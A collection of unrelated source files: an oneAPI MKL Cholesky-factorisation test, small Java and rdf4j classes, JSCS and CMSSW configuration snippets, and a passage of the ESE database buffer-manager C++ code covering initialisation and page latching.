* | . . . |
* | . . . |
* | B_N-2 D_N-1 B_N-1^t |
* | B_N-1 D_N |
* by calling TEST_RES which calculates ratio of Frobenius norms
* ||A-L*L^t||_F/||A||_F.
*/
#include <cstdint>
#include <iostream>
#include <vector>
#include <CL/sycl.hpp>
#include "oneapi/mkl.hpp"
using namespace oneapi;
int64_t dpbltrf(sycl::queue queue, int64_t n, int64_t nb, double* d, int64_t ldd, double* b, int64_t ldb);
double test_res(int64_t, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t);
template<typename T>
using allocator_t = sycl::usm_allocator<T, cl::sycl::usm::alloc::shared>;
int main() {
if (sizeof(MKL_INT) != sizeof(int64_t)) {
std::cerr << "MKL_INT not 64bit" << std::endl;
return -1;
}
int64_t info = 0;
// Asynchronous error handler
auto error_handler = [&] (sycl::exception_list exceptions) {
for (auto const& e : exceptions) {
try {
std::rethrow_exception(e);
} catch(mkl::lapack::exception const& e) {
// Handle LAPACK related exceptions happened during asynchronous call
info = e.info();
std::cout << "Unexpected exception caught during asynchronous LAPACK operation:\ninfo: " << e.info() << std::endl;
} catch(sycl::exception const& e) {
// Handle not LAPACK related exceptions happened during asynchronous call
std::cout << "Unexpected exception caught during asynchronous operation:\n" << e.what() << std::endl;
info = -1;
}
}
};
sycl::device device{cl::sycl::default_selector{}};
sycl::queue queue(device, error_handler);
sycl::context context = queue.get_context();
if (device.get_info<sycl::info::device::double_fp_config>().empty()) {
std::cerr << "The sample uses double precision, which is not supported" << std::endl;
std::cerr << "by the selected device. Quitting." << std::endl;
return 0;
}
allocator_t<double> allocator_d(context, device);
MKL_INT n = 200;
MKL_INT nb = 20;
std::vector<double, allocator_t<double>> d(nb * n*nb, allocator_d);
std::vector<double, allocator_t<double>> b(nb * (n-1)*nb, allocator_d);
std::vector<double> d1(nb * n*nb);
std::vector<double> b1(nb * (n-1)*nb);
std::vector<double> d2(nb * n*nb);
std::vector<double> b2(nb * (n-1)*nb);
std::vector<MKL_INT> iseed = {1, 2, 33, 15};
auto D = [=,&d](int64_t i, int64_t j) -> double& { return d[i + j*nb]; };
std::cout << "Testing accuracy of Cholesky factorization\n";
std::cout << "of randomly generated positive definite symmetric\n";
std::cout << "block tridiagonal matrix by calculating residual.\n\n";
std::cout << "Matrix size = " << n << "\n";
std::cout << "Block size = " << nb << "\n";
std::cout << "...\n";
std::cout << "Matrices are being generated.\n";
std::cout << "...\n";
// Initializing arrays randomly
LAPACKE_dlarnv(2, iseed.data(), (n-1)*nb*nb, b.data());
cblas_dcopy((n-1)*nb*nb, b.data(), 1, b2.data(), 1);
for (int64_t k = 0; k < n; k++) {
for (int64_t j = 0; j < nb; j++) {
LAPACKE_dlarnv(2, iseed.data(), nb-j, &D(j,k*nb+j));
cblas_dcopy(nb-j, &D(j+1, k*nb+j), 1, &D(j, k*nb+j+1), nb);
}
// Diagonal dominance to make the matrix positive definite
for (int64_t j = 0; j < nb; j++) {
D(j, k*nb+j) += nb*3.0;
}
}
cblas_dcopy(n*nb*nb, d.data(), 1, d2.data(), 1);
std::cout << "Call Cholesky factorization\n";
std::cout << "...\n";
try {
info = dpbltrf(queue, n, nb, d.data(), nb, b.data(), nb);
} catch(sycl::exception const& e) {
// Handle not LAPACK related exceptions happened during synchronous call
std::cout << "Unexpected exception caught during synchronous call to SYCL API:\n" << e.what() << std::endl;
info = -1;
}
if(info) {
std::cout << "Factorization failed. info = " << info << std::endl;
return 1;
} else {
std::cout << "Cholesky factorization succeeded." << std::endl;
std::cout << "Testing the residual" << std::endl;
std::cout << "..." << std::endl;
double res = test_res(n, nb, d.data(), nb, b.data(), nb, d1.data(), nb, b1.data(), nb, d2.data(), nb, b2.data(), nb);
double eps = LAPACKE_dlamch('E');
std::cout << "Residual test" << std::endl;
std::cout << "||A-L*L^t||_F/||A||_F <= 5*EPS..." << std::endl;
if (res/eps > 5.0) {
std::cout << "failed: ||A-L*L^t||_F/||A||_F = " << res << std::endl;
return 1;
} else {
std::cout << "passed" << std::endl;
}
}
return 0;
}
| 2,916 |
1,082 |
package com.jzy.game.bydr.struct.room;
/**
* 经典渔场
* @author JiangZhiYong
* @QQ 359135103
* 2017年9月14日 上午9:30:30
*/
public class ClassicsRoom extends Room {
}
| 92 |
312 |
package org.eclipse.rdf4j.sail.shacl.ast.planNodes;
import org.eclipse.rdf4j.common.iteration.CloseableIteration;
import org.eclipse.rdf4j.sail.SailException;
import org.eclipse.rdf4j.sail.shacl.GlobalValidationExecutionLogging;
public abstract class LoggingCloseableIteration implements CloseableIteration<ValidationTuple, SailException> {
private final ValidationExecutionLogger validationExecutionLogger;
private final PlanNode planNode;
private boolean empty = false;
private boolean closed;
public LoggingCloseableIteration(PlanNode planNode, ValidationExecutionLogger validationExecutionLogger) {
this.planNode = planNode;
this.validationExecutionLogger = validationExecutionLogger;
}
@Override
public final ValidationTuple next() throws SailException {
ValidationTuple tuple = loggingNext();
if (GlobalValidationExecutionLogging.loggingEnabled) {
validationExecutionLogger.log(planNode.depth(), planNode.getClass().getSimpleName() + ".next()", tuple,
planNode, planNode.getId(), null);
}
return tuple;
}
@Override
public final boolean hasNext() throws SailException {
if (empty) {
return false;
}
boolean hasNext = localHasNext();
if (!hasNext) {
empty = true;
assert !localHasNext() : "Iterator was initially empty, but still has more elements! " + this.getClass();
close();
}
return hasNext;
}
@Override
public void close() throws SailException {
if (!closed) {
this.closed = true;
localClose();
}
}
protected abstract ValidationTuple loggingNext() throws SailException;
protected abstract boolean localHasNext() throws SailException;
protected abstract void localClose() throws SailException;
/**
* A default method since the iterators in the ShaclSail don't support remove.
*
* @throws SailException
*/
@Override
public void remove() throws SailException {
throw new UnsupportedOperationException();
}
}
| 597 |
1,505 |
{
"preset": "google",
"disallowSpacesInsideObjectBrackets": null,
"requireSpacesInsideObjectBrackets": {
"allExcept": [ "[", "]", "{", "}" ]
},
"disallowSpacesInsideArrayBrackets": null,
"requireSpacesInsideArrayBrackets": {
"allExcept": [ "[", "]", "{", "}" ]
},
"disallowKeywordsOnNewLine": [ ],
"disallowMultipleVarDecl": null,
"maximumLineLength": 120,
"requireSemicolons": true
}
| 152 |
852 |
import FWCore.ParameterSet.Config as cms
# Reading from DB
from CondCore.DBCommon.CondDBSetup_cfi import *
PoolDBESSource = cms.ESSource("PoolDBESSource",
CondDBSetup,
connect = cms.string('frontier://FrontierProd/CMS_COND_21X_ALIGNMENT'),
toGet = cms.VPSet(cms.PSet(
record = cms.string('TrackerAlignmentRcd'),
tag = cms.string('TibTidTecAllSurvey_v2')
),
cms.PSet(
record = cms.string('TrackerAlignmentErrorExtendedRcd'),
tag = cms.string('TibTidTecAllSurveyAPE_v2')
))
)
| 257 |
803 |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
#include "std.hxx"
#include "_bf.hxx"
// Only Init requires the global cbPage, subsequent this point the buffer manager is page independent, and
// supports multiple page sizes concurrently.
//
#ifdef g_cbPage
#undef g_cbPage
#endif
#define g_cbPage g_cbPage_BF_NOT_ALLOWED_TO_USE_THIS_VARIABLE
#include <malloc.h>
// This is a global instance of the lookaside list for local buffers
CSmallLookasideCache* g_pBFAllocLookasideList;
///////////////////////////////////////////////////////////////////////////////
//
// BF API Functions
//
///////////////////////////////////////////////////////////////////////////////
/////////////////
// Init / Term
// The following functions control the initialization and termination of
// the buffer manager.
// Initializes the buffer manager for normal operation. Must be called
// only once and BFTerm() must be called before process termination. If an
// error is returned, the buffer manager is not initialized.
// Note that the cbPageSizeMax is the maximum size page that will be requested
// of the buffer manager. Currently this is the page size ESE is configured
// for ... someday we might have no max page size.
ERR ErrBFInit( __in const LONG cbPageSizeMax )
{
ERR err = JET_errSuccess;
// must not have been initialized
Assert( !g_fBFInitialized );
Assert( !g_fBFCacheInitialized );
// CONSIDER: expose these settings
g_dblBFSpeedSizeTradeoff = 0.0;
g_dblBFHashLoadFactor = 5.0;
g_dblBFHashUniformity = 1.0;
g_csecBFLRUKUncertainty = 1.0;
// initialize BF's FTL tracing if in a regular mode of running
CallJ( ErrBFIFTLInit(), Validate );
// reset all stats
cBFOpportuneWriteIssued = 0;
PERFOpt( g_cBFVersioned = 0 );
// set all globals
Assert( g_rgbBFTemp == NULL );
Assert( g_pBFAllocLookasideList == NULL );
g_rgbBFTemp = NULL;
g_pBFAllocLookasideList = NULL;
// allocate temp buffer and lookaside list.
if ( BoolParam( JET_paramEnableViewCache ) )
{
g_rgbBFTemp = (BYTE*)PvOSMemoryPageAlloc( cbPageSizeMax, NULL );
if ( NULL == g_rgbBFTemp )
{
err = ErrERRCheck( JET_errOutOfMemory );
goto TermMemoryAlloc;
}
}
g_pBFAllocLookasideList = new CSmallLookasideCache();
if ( g_pBFAllocLookasideList == NULL )
{
err = ErrERRCheck( JET_errOutOfMemory );
goto TermMemoryAlloc;
}
// init all components
switch ( g_bfhash.ErrInit( g_dblBFHashLoadFactor,
g_dblBFHashUniformity ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF Hash Table" );
case BFHash::ERR::errOutOfMemory:
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermLRUK );
case BFHash::ERR::errSuccess:
break;
}
// for now we initialize the largest possible page we might be requested for.
g_pBFAllocLookasideList->Init( cbPageSizeMax );
switch ( g_bfavail.ErrInit( g_dblBFSpeedSizeTradeoff ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF Avail Pool" );
case BFAvail::ERR::errOutOfMemory:
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermLRUK );
case BFAvail::ERR::errSuccess:
break;
}
Assert( g_bfquiesced.FEmpty() );
CallJ( ErrBFIMaintScavengePreInit( max( 1, min( Kmax, INT( UlParam( JET_paramLRUKPolicy ) ) ) ),
double( UlParam( JET_paramLRUKCorrInterval ) ) / 1000000,
double( UlParam( JET_paramLRUKTimeout ) ),
g_csecBFLRUKUncertainty,
g_dblBFHashLoadFactor,
g_dblBFHashUniformity,
g_dblBFSpeedSizeTradeoff ), TermLRUK );
CallJ( ErrBFICacheInit( cbPageSizeMax ), TermLRUK );
g_fBFCacheInitialized = fTrue;
if ( !g_critpoolBFDUI.FInit( OSSyncGetProcessorCount(), rankBFDUI, szBFDUI ) )
{
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermCache );
}
CallJ( ErrBFIMaintInit(), TermDUI );
// init successful
g_fBFInitialized = fTrue;
goto Validate;
// term all initialized threads / components
TermDUI:
g_critpoolBFDUI.Term();
TermCache:
g_fBFCacheInitialized = fFalse;
BFICacheTerm();
TermLRUK:
g_bflruk.Term();
g_bfavail.Term();
g_bfquiesced.Empty();
g_bfhash.Term();
TermMemoryAlloc:
OSMemoryPageFree( g_rgbBFTemp );
g_rgbBFTemp = NULL;
delete g_pBFAllocLookasideList;
g_pBFAllocLookasideList = NULL;
BFIFTLTerm();
Validate:
Assert( err == JET_errOutOfMemory ||
err == JET_errOutOfThreads ||
err == JET_errSuccess );
Assert( ( err != JET_errSuccess && !g_fBFInitialized ) ||
( err == JET_errSuccess && g_fBFInitialized ) );
return err;
}
// Terminates the buffer manager. Must be called before process
// termination to avoid loss of system resources. Cannot be called before
// ErrBFInit().
//
// NOTE: To avoid losing changes to pages, you must call ErrBFFlush() before
// BFTerm()!
//
// UNDONE: Calling BFTerm() without calling ErrBFFlush() can cause the loss
// of any deferred undo information attached to each buffer. This can result
// in recovery failure!!! Should BFTerm() force any existing deferred undo
// info to disk to prevent this?
void BFTerm()
{
// must have been initialized
Assert( g_fBFInitialized );
Assert( g_fBFCacheInitialized );
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfTerm, NULL );
if ( g_rgfmp )
{
for ( IFMP ifmp = cfmpReserved; ifmp < g_ifmpMax && FMP::FAllocatedFmp( ifmp ); ifmp++ )
{
if ( g_rgfmp[ ifmp ].FBFContext() )
{
BFPurge( ifmp );
}
}
}
g_fBFInitialized = fFalse;
// terminate all components
BFIMaintTerm();
g_critpoolBFDUI.Term();
g_fBFCacheInitialized = fFalse;
BFICacheTerm();
g_bflruk.Term();
BFITraceResMgrTerm();
g_bfavail.Term();
g_bfquiesced.Empty();
OSMemoryPageFree( g_rgbBFTemp );
g_rgbBFTemp = NULL;
#ifdef DEBUG
OSMemoryPageFree( g_pvIoThreadImageCheckCache );
g_pvIoThreadImageCheckCache = NULL;
#endif
g_pBFAllocLookasideList->Term();
delete g_pBFAllocLookasideList;
g_pBFAllocLookasideList = NULL;
g_bfhash.Term();
BFIFTLTerm();
}
///////////////////////
// System Parameters
// The following functions are used to get and set the many system
// parameters used by the buffer manager during runtime. Most of these
// parameters are used for optimizing performance.
// Returns the current size of the cache in pages.
ERR ErrBFGetCacheSize( ULONG_PTR* const pcpg )
{
// validate IN args
if ( pcpg == NULL )
{
return ErrERRCheck( JET_errInvalidParameter );
}
const LONG_PTR cbfCacheSizeT = cbfCacheSize;
const LONG_PTR cbfBFIAveCredit = CbfBFIAveCredit();
*pcpg = ( cbfCacheSizeT > cbfBFIAveCredit ) ? ( cbfCacheSizeT - cbfBFIAveCredit ) : 0;
return JET_errSuccess;
}
// Sets the current (preferred) size of the cache in pages.
// Requests a cache size maintenance task.
ERR ErrBFIStartCacheTasks()
{
ERR err = JET_errSuccess;
if ( g_fBFInitialized )
{
BFICacheSetTarget( OnDebug( -1 ) );
Call( ErrBFIMaintCacheSizeRequest() );
Call( ErrBFIMaintCacheStatsRequest( bfmcsrtForce ) );
}
HandleError:
return err;
}
ERR ErrBFSetCacheSize( const ULONG_PTR cpg )
{
ERR err = JET_errSuccess;
// set the user set point
g_critCacheSizeSetTarget.Enter();
g_cbfCacheUserOverride = cpg;
g_critCacheSizeSetTarget.Leave();
Call( ErrBFIStartCacheTasks() );
HandleError:
return err;
}
ERR ErrBFConsumeSettings( BFConsumeSetting bfcs, const IFMP ifmp )
{
ERR err = JET_errSuccess;
if ( bfcs & bfcsCacheSize )
{
Assert( ifmp == ifmpNil);
Call( ErrBFIStartCacheTasks() );
bfcs = BFConsumeSetting( bfcs & ~bfcsCacheSize );
}
if ( bfcs & bfcsCheckpoint )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ifmp], bfcpdmrRequestConsumeSettings );
bfcs = BFConsumeSetting( bfcs & ~bfcsCheckpoint );
}
AssertSz( bfcs == 0, "Unknown settings (%d / 0x%x) bits left unhandled", bfcs, bfcs );
HandleError:
return err;
}
ERR ErrBFCheckMaintAvailPoolStatus()
{
const LONG_PTR cbfAvail = g_bfavail.Cobject();
if ( cbfAvail < cbfAvailPoolLow )
{
return ErrERRCheck( JET_wrnIdleFull );
}
return JET_errSuccess;
}
ERR ErrBFICapturePagePreimage( BF *pbf, RBS_POS *prbsposSnapshot )
{
// If page has already been dirtied once since the start of the snapshot, we do not need to collect pre-image again.
if ( g_rgfmp[ pbf->ifmp ].Dbid() == dbidTemp ||
!g_rgfmp[ pbf->ifmp ].FRBSOn() )
{
return JET_errSuccess;
}
if ( ((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied == 0 ||
((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied > g_rgfmp[ pbf->ifmp ].DbtimeBeginRBS() ||
pbf->rbsposSnapshot.lGeneration == g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint().lGeneration )
{
*prbsposSnapshot = pbf->rbsposSnapshot;
return JET_errSuccess;
}
ERR err = g_rgfmp[ pbf->ifmp ].PRBS()->ErrCapturePreimage( g_rgfmp[ pbf->ifmp ].Dbid(), pbf->pgno, (const BYTE *)pbf->pv, CbBFIBufferSize( pbf ), prbsposSnapshot );
OSTrace( JET_tracetagRBS, OSFormat(
"Collecting pre-image dbid:%u,pgno:%lu,dbtime:0x%I64x,dbtimeBegin:0x%I64x,rbspos:%u,%u\n",
g_rgfmp[ pbf->ifmp ].Dbid(),
pbf->pgno,
(DBTIME)((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied,
g_rgfmp[ pbf->ifmp ].DbtimeBeginRBS(),
prbsposSnapshot->lGeneration,
prbsposSnapshot->iSegment ) );
return err;
}
ERR ErrBFICaptureNewPage( BF *pbf, RBS_POS *prbsposSnapshot )
{
// If page has already been dirtied once since the start of the snapshot, we do not need to snapshot again.
if ( g_rgfmp[ pbf->ifmp ].Dbid() == dbidTemp ||
!g_rgfmp[ pbf->ifmp ].FRBSOn() )
{
return JET_errSuccess;
}
if ( pbf->rbsposSnapshot.lGeneration == g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint().lGeneration )
{
*prbsposSnapshot = pbf->rbsposSnapshot;
return JET_errSuccess;
}
ERR err = g_rgfmp[ pbf->ifmp ].PRBS()->ErrCaptureNewPage( g_rgfmp[ pbf->ifmp ].Dbid(), pbf->pgno, prbsposSnapshot );
OSTrace( JET_tracetagRBS, OSFormat(
"Collecting new-page dbid:%u,pgno:%lu,rbspos:%u,%u\n",
g_rgfmp[ pbf->ifmp ].Dbid(),
pbf->pgno,
prbsposSnapshot->lGeneration,
prbsposSnapshot->iSegment ) );
return err;
}
//////////////////
// Page Latches
ERR ErrBFReadLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp() == iorpNone );
// the latch flag criteria are met for a possible fast latch using a user
// provided hint
const BFLatchFlags bflfMask = BFLatchFlags( bflfNoCached | bflfHint );
const BFLatchFlags bflfPattern = BFLatchFlags( bflfHint );
if ( ( bflf & bflfMask ) == bflfPattern )
{
// fetch the hint from the BFLatch. we assume that the latch contains
// either a valid PBF, a valid BFHashedLatch*, or NULL
Assert( FBFILatchValidContext( pbfl->dwContext ) || !pbfl->dwContext );
PBF pbfHint;
if ( pbfl->dwContext & 1 )
{
pbfHint = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
}
else
{
pbfHint = PBF( pbfl->dwContext );
}
// the hint is not NULL (this can happen if a NULL hint was passed in
// or if a hashed latch hint was passed in and it is not currently
// owned by a BF)
if ( pbfHint != pbfNil )
{
// determine what latch we will acquire. if the BF has been promoted
// to a hashed latch then we will use the appropriate hashed latch for
// the appropriate processor. otherwise, we will simply use the latch
// on the BF
PLS* ppls;
CSXWLatch* psxwl;
const size_t iHashedLatch = pbfHint->iHashedLatch;
// Note: This is unioned with tickEligibleForNomination and tickViewLastRefreshed
// but when using it for ticks, the other code simply skips over the tiny
// number of cBFHashedLatch slots we use (16 today).
if ( iHashedLatch < cBFHashedLatch )
{
ppls = Ppls();
psxwl = &ppls->rgBFHashedLatch[ iHashedLatch ].sxwl;
}
else
{
ppls = NULL;
psxwl = &pbfHint->sxwl;
}
// try to latch the page as if bflfNoWait were specified. we must do
// this to be compatible with the locking scheme in ErrBFIEvictPage()
//
// NOTE: we must disable ownership tracking here because we may
// accidentally try to latch a buffer we already have latched (due
// to a stale latch hint) causing an assert. The assert would be
// invalid because we will later find out the buffer we double latched
// isn't the actual ifmp:pgno we were trying to latch, so we shouldn't
// have the latch anyway (as it isn't the right page) and release it.
CLockDeadlockDetectionInfo::DisableOwnershipTracking(); // proper not-ownership will be checked below
if ( psxwl->ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
// verify that we successfully latched the intended BF and that BF
// contains the current version of this IFMP / PGNO and that it is
// not in an error state
PBF pbfLatch;
if ( iHashedLatch < cBFHashedLatch )
{
pbfLatch = ppls->rgBFHashedLatch[ iHashedLatch ].pbf;
}
else
{
pbfLatch = pbfHint;
}
if ( pbfLatch == pbfHint &&
FBFICurrentPage( pbfHint, ifmp, pgno ) &&
!pbfHint->fAbandoned &&
!FBFIChance( 25 ) &&
( err = pbfHint->err ) >= JET_errSuccess &&
( pbfHint->bfat != bfatViewMapped || FBFICacheViewFresh( pbfHint ) ) &&
pbfHint->bfrs == bfrsResident )
{
// transfer ownership of the latch to the current context. we
// must do this to properly set up deadlock detection for this
// latch
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// now that we were able to get the latch and we have proven it is
// the current page we wanted, then we must not have owned it.
Assert( psxwl->FNotOwner() );
psxwl->ClaimOwnership( bfltShared );
// touch this page if requested
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflf & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
BFITouchResource( pbfHint, bfltShared, bflf, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pbfHint->ifmp ), pbfHint->tce ) );
pbfl->pv = pbfHint->pv;
pbfl->dwContext = DWORD_PTR( pbfHint );
if ( iHashedLatch < cBFHashedLatch )
{
ppls->rgBFHashedLatch[ iHashedLatch ].cCacheReq++;
pbfl->dwContext = DWORD_PTR( &ppls->rgBFHashedLatch[ iHashedLatch ] ) | 1;
}
else if ( pbfHint->bfls == bflsElect )
{
Ppls()->rgBFNominee[ 0 ].cCacheReq++;
}
Assert( FParentObjectClassSet( tc.nParentObjectClass ) );
Assert( FEngineObjidSet( tc.dwEngineObjid ) );
goto HandleError;
}
psxwl->ReleaseSharedLatch();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltShared, bfpri, tc ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFReadLatched( pbfl ) );
Assert( FBFICurrentPage( PbfBFILatchContext( pbfl->dwContext ), ifmp, pgno ) );
// Interestingly this is not guaranteed, because we're exceedingly clever and checksum
// the page under r-latch while someone else has an x-latch after an initial read, but
// that other thread hasn't finished and updated the BF err state.
//Assert( PbfBFILatchContext( pbfl->dwContext )->err != errBFIPageNotVerified );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFRDWLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
// the latch flag criteria are met for a possible fast latch using a user
// provided hint
const BFLatchFlags bflfMask = BFLatchFlags( bflfNoCached | bflfHint );
const BFLatchFlags bflfPattern = BFLatchFlags( bflfHint );
if ( ( bflf & bflfMask ) == bflfPattern )
{
// fetch the hint from the BFLatch. we assume that the latch contains
// either a valid PBF, a valid BFHashedLatch*, or NULL
Assert( FBFILatchValidContext( pbfl->dwContext ) || !pbfl->dwContext );
PBF pbfHint;
if ( pbfl->dwContext & 1 )
{
pbfHint = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
}
else
{
pbfHint = PBF( pbfl->dwContext );
}
// the hint is not NULL (this can happen if a NULL hint was passed in
// or if a hashed latch hint was passed in and it is not currently
// owned by a BF)
if ( pbfHint != pbfNil )
{
// try to latch the page as if bflfNoWait were specified. we must do
// this to be compatible with the locking scheme in ErrBFIEvictPage()
//
// NOTE: we must disable ownership tracking here because we may
// accidentally try to latch a buffer we already have latched (due
// to a stale latch hint) causing an assert. The assert would be
// invalid because we will later find out the buffer we double latched
// isn't the actual ifmp:pgno we were trying to latch, so we shouldn't
// have the latch anyway (as it isn't the right page) and release it.
CLockDeadlockDetectionInfo::DisableOwnershipTracking(); // proper not-ownership will be checked below
if ( pbfHint->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
// this BF contains the current version of this IFMP / PGNO and it
// is not in an error state
if ( FBFICurrentPage( pbfHint, ifmp, pgno ) &&
!pbfHint->fAbandoned &&
FBFIUpdatablePage( pbfHint ) &&
( err = pbfHint->err ) >= JET_errSuccess &&
( pbfHint->bfat != bfatViewMapped || FBFICacheViewFresh( pbfHint ) ) &&
pbfHint->bfrs == bfrsResident )
{
// transfer ownership of the latch to the current context. we
// must do this to properly set up deadlock detection for this
// latch
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// now that we were able to get the latch and we have proven it is
// the current page we wanted, then we must not have owned it.
// note we could do this right after x-latch because it is exclusive,
// with itselfs, but we'll leave it here for symetry with the fast
// read/s-latch path.
Assert( pbfHint->sxwl.FNotOwner() );
pbfHint->sxwl.ClaimOwnership( bfltExclusive );
// touch this page if requested
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflf & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
BFITouchResource( pbfHint, bfltExclusive, bflf, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pbfHint->ifmp ), pbfHint->tce ) );
pbfl->pv = pbfHint->pv;
pbfl->dwContext = DWORD_PTR( pbfHint );
goto HandleError;
}
pbfHint->sxwl.ReleaseExclusiveLatch();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltExclusive, bfpri, tc ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFRDWLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Expected( FBFUpdatableLatch( pbfl ) ); // because we could upgrade this to w-latch in place
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFWARLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
// if we are mapping views then do not allow discretionary updates
if ( BoolParam( JET_paramEnableViewCache ) )
{
CallR( ErrERRCheck( errBFLatchConflict ) );
}
// RDW Latch the page
Call( ErrBFRDWLatchPage( pbfl, ifmp, pgno, bflf, bfpri, tc ) );
// mark this BF as WAR Latched
PBF( pbfl->dwContext )->fWARLatch = fTrue;
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWARLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFWriteLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc, BOOL* const pfCachedNewPage )
{
ERR err;
BOOL fCachedNewPage = fFalse;
RBS_POS rbsposSnapshot = rbsposMin;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) || !( bflf & bflfNoTouch ) ); // required for proper tracing
Assert( tc.iorReason.Iorp( ) == iorpNone );
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltWrite, bfpri, tc, &fCachedNewPage ) );
Assert( !fCachedNewPage || ( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( PBF( pbfl->dwContext )->ifmp == ifmp );
Assert( FBFUpdatableLatch( pbfl ) );
if ( bflf & ( bflfNew | bflfNewIfUncached ) )
{
// Capture the fact that we are doing a new-page (to allow us to revert this operation)
err = ErrBFICaptureNewPage( PBF( pbfl->dwContext ), &rbsposSnapshot );
}
else
{
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
}
if ( err < JET_errSuccess )
{
BFWriteUnlatch( pbfl );
goto HandleError;
}
#ifdef DEBUG
const PBF pbfPreMaint = PBF( pbfl->dwContext );
#endif
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( PBF( pbfl->dwContext ), fTrue, pbfl );
